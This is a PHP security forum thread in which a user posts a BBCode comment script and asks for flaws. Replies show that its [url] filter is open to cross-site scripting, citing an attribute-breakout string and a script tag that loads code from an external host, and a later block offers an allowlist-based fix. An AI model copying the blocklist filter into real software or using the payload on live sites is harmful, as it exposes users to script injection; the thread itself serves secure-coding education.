Form Security Advice?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Form Security Advice?

Post by kaisellgren »

Greetings dear members!

I have been reading thousands of articles about PHP security and I wrote a simple comment script.

Can you find anything 'evilish' or even annoying bugs?

Code:

<?php

$message = $_POST["message"];

/*
 No HTML accepted directly. Only accepted using through BBCode.
*/
$message = htmlspecialchars($message);

/*
 Convert line feeds and carriage returns to <br /> tag.
*/
$message = preg_replace("/\x0D\x0A/","<br />",$message);

/*
 Replacing all BBCode URL tags [url=xxx]yyy[/url] with working HTML anchors
 IF the xxx does NOT contain the characters '(', ')' or ';'.
 
 This makes it possible to use any protocol in anchors that does not carry anything dangerous.
 For example 'mailto:example@host.com' is valid while 'javascript: alert();' is not.
 
 The reason why I like this method is that when you type '[url=javascript:alert("hacked");]click[/url]',
 it will not be stripped out or even modified - it will be shown as it is: '[url=javascript:alert("hacked");]click[/url]'.
*/
$message = preg_replace("/\[url=([^\]\(\);]+?)\](.+?)\[\/url\]/i","<a href=\"\\1\">\\2</a>",$message);

echo $message;

?>
I really want it to be totally 'unhackable'. ANY advice taken.

Thank you for your time! :)
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Post by kaisellgren »

feyd wrote:Your url tag accepts injection.

Your line-feed regular expression could easily be replaced by str_replace() using \r\n as the needle.
I read something on Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?

What kind of injection is the url tag vulnerable to? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but who cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tried anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE?
Ambush Commander
DevNet Master
Posts: 3698
Joined: Mon Oct 25, 2004 9:29 pm
Location: New Jersey, US

Post by Ambush Commander »

kaisellgren wrote:I read something on Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
kaisellgren wrote:What kind of injection is the url tag vulnerable to? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but who cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tried anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't; see this:

Code:

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.
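The thread's advice is to validate the whole URL rather than blocklist three characters. The renderer below is an added example of that approach, not kaisellgren's script and not code posted in the thread: it escapes everything first (with ENT_QUOTES, so attribute quotes are covered), then turns a [url] tag into an anchor only when the scheme is on an allowlist. The function names safe_href() and render_message(), the allowlist contents and the sample inputs are my own assumptions; it also goes slightly beyond the original by converting bare \n and \r line endings, not just \r\n.

```php
<?php
// Added example (not the thread's code): allowlist-based [url=...]...[/url] rendering.

/**
 * Accept only absolute http(s)/mailto URLs or site-relative paths starting with "/".
 * Returns the URL to emit, or null if the value must not become a link.
 */
function safe_href(string $url): ?string
{
    // Drop ASCII control characters and whitespace first; a scheme check on the
    // raw string would otherwise be fooled by characters browsers ignore.
    $url = preg_replace('/[\x00-\x20\x7F]+/', '', $url);

    if ($url === '') {
        return null;
    }
    // Site-relative path ("/x"), but not protocol-relative ("//host").
    if ($url[0] === '/' && ($url[1] ?? '') !== '/') {
        return $url;
    }
    // Anything else must carry an explicit scheme that we recognise.
    if (!preg_match('#^([a-z][a-z0-9+.-]*):#i', $url, $m)) {
        return null;
    }
    $scheme  = strtolower($m[1]);
    $allowed = ['http', 'https', 'mailto'];   // assumed policy for this example
    if (!in_array($scheme, $allowed, true)) {
        return null;
    }
    if ($scheme !== 'mailto' && filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    return $url;
}

function render_message(string $raw): string
{
    // Escape first, including quotes, so no raw markup reaches the output.
    $message = htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // Line endings: \r\n, then lone \r or \n.
    $message = str_replace(["\r\n", "\r", "\n"], '<br />', $message);

    // [url=xxx]yyy[/url] becomes an anchor only when safe_href() accepts xxx;
    // otherwise the tag is left visible as text, as the original script intended.
    return preg_replace_callback(
        '/\[url=([^\]]+?)\](.+?)\[\/url\]/i',
        function (array $m): string {
            // $m[1] is already entity-encoded; decode it to validate the real URL.
            $href = safe_href(html_entity_decode($m[1], ENT_QUOTES | ENT_HTML5, 'UTF-8'));
            if ($href === null) {
                return $m[0];
            }
            $href = htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8');
            return '<a href="' . $href . '" rel="nofollow">' . $m[2] . '</a>';
        },
        $message
    );
}

// Constructed sample inputs (not taken from the thread) for a quick self-check.
$samples = [
    '[url=http://example.com/?a=1&b=2]site[/url]',   // becomes a link, & re-escaped as &amp;
    '[url=mailto:example@host.com]mail[/url]',        // becomes a link
    '[url=javascript:alert]click[/url]',              // scheme not allowed: stays as text
    '[url=">Hmm<"]x[/url]',                           // no scheme: stays as (escaped) text
];
foreach ($samples as $s) {
    echo render_message($s), "\n";
}
```

Validating after decoding matters: the tag contents were escaped by htmlspecialchars() in the first step, so the callback has to undo that before checking the scheme, and then re-escape the accepted value when writing the attribute. Refusing anything without a recognised scheme is what makes the "it has no parentheses" class of URLs irrelevant.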
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Post by kaisellgren »

Ambush Commander wrote:
kaisellgren wrote:I read something on Wikipedia that it's better to use \x0D\x0A than \r\n for some reason... don't remember why. Maybe it does not matter when it comes to web programming?
This is applicable to languages where "\n" is not really "\x0A" but rather a magic character that is OS-dependent. PHP is not one of those languages, so stick with "\r\n".
kaisellgren wrote:What kind of injection is the url tag vulnerable to? Javascript, no... vbscript no... applets no, file no, about no, wysiwyg no, data no, view-source yes! but who cares? , ms-its no, mhtml, shell, lynxexec, lynxcgi, hcp, ms-help, help, disk, vnd.ms.radio, opera, res, resource, chrome, mocha, livescript, .... tried anything I can ever find but nothing passed. Nothing evilish... or is it that it does not work in my browser but works in IE?
Try setting message to =">Hmm<". You also assume that JavaScript needs () to work: it doesn't; see this:

Code:

><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><
Just use a fully fledged URI regex.
Strange, but this sdfsd is output as sdfsd without any html anchors. Why? In my regex only ](); are listed, so it should make it an anchor. Perhaps some security thing in PHP? Also this outputs only text:

Code:

[url=">Hmm<"]sdfsd[/url]
Nothing dangerous in that, just tested. Or did I type something wrong? I guess you tried to break the html anchor tag with "> and output Hmm, but it didn't work.

EDIT: I realized: both your first and second methods don't work because I used htmlspecialchars()!